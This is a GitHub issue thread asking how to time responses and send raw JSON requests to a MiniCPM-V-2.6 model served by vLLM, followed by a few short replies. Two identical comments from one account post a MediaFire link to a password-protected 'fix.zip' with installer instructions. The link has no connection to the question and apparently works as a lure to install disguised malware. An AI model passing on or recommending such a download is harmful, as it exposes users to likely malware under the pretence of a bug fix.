### ISSUE TITLE
[BUG] <title>how to test the time of response about minicpm-v-2.6 served by VLLM

### ISSUE THREAD

**Issue by Mysnake** [OpenBMB/MiniCPM-V#516]
### 是否已有关于该错误的issue或讨论？ | Is there an existing issue / discussion for this?

- [X] 我已经搜索过已有的issues和讨论 | I have searched the existing issues / discussions

### 该问题是否在FAQ中有解答？ | Is there an existing answer for this in FAQ?

- [X] 我已经搜索过FAQ | I have searched FAQ

### 当前行为 | Current Behavior

I depoly minicpmv though VLLM, but I want to test the  the time of response. 
First, I use OpenAI.chat.completions.create() to access the server. It response the result successfully. Code in the following:
![image](https://github.com/user-attachments/assets/07587d62-97e2-482a-8390-81af8365c3bc)

And then, I use post request to access the server. Code is in the following:
![image](https://github.com/user-attachments/assets/fb0e5f31-1b9b-4684-8cf0-81acee7f5e24)

![image](https://github.com/user-attachments/assets/ef3c2597-176a-4c71-811f-bfbec2c20bf9)

The log of server is 
![image](https://github.com/user-attachments/assets/96fb271d-daf4-4e8b-b6d6-0399be667e0a)

the request json 
How can I send the request of json to server?

### 运行环境 | Environment

```Markdown
- OS:
- Python:
- Transformers:
- PyTorch:
- CUDA (`python -c 'import torch; print(torch.version.cuda)'`):
```

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 476258834lzx** [comment]
你好，vllm 端点启动可以支持视频吗

**Comment by LDLINGLINGLING** [comment]
请看这个教程https://modelbest.feishu.cn/wiki/LZxLwp4Lzi29vXklYLFchwN5nCf?from=from_copylink
